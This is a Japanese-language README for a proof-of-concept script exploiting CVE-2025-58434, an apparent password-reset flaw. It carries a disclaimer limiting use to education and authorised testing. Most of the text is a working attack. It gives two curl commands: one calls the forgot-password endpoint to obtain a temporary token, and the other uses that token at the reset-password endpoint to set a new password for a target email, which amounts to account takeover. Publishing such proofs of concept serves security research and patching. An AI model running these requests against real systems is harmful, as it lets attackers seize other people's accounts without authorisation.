
CVE-2025-58434 概念実証
POST /api/v1/account/forgot-password をトリガーする Python の PoC スクリプトです。
⚠️ 教育目的および許可されたセキュリティ研究のみを対象としています。 自分が所有していない、または書面によるテスト許可がないシステムに対してこのツールを実行することは違法です。
zaddy6 (Isaac David)arthurgervais (Arthur Gervais)CVE-2025-58434 の PoCpoc.py: マシンのURL/IP、ベアのホスト/IP使用時は任意のプロトコル、対象のメールアドレス、パスワードを入力させ、リクエストを送信して、curl -i と同様にHTTPステータス、ヘッダー、レスポンスボディを出力します。実行:
python3 poc.py
その後、以下を入力します:
10.10.11.10、http://10.10.11.10、https://target.example)curl -i -X POST https://<MACHINE_URL/IP>/api/v1/account/forgot-password \
-H "Content-Type: application/json" \
-d '{"user":{"email":"<[email protected]>"}}'
curl -i -X POST https://<target>/api/v1/account/reset-password \
-H "Content-Type: application/json" \
-d '{
"user":{
"email":"<[email protected]>",
"tempToken":"<tempToken>",
"password":"NewSecurePassword123!"
}
}'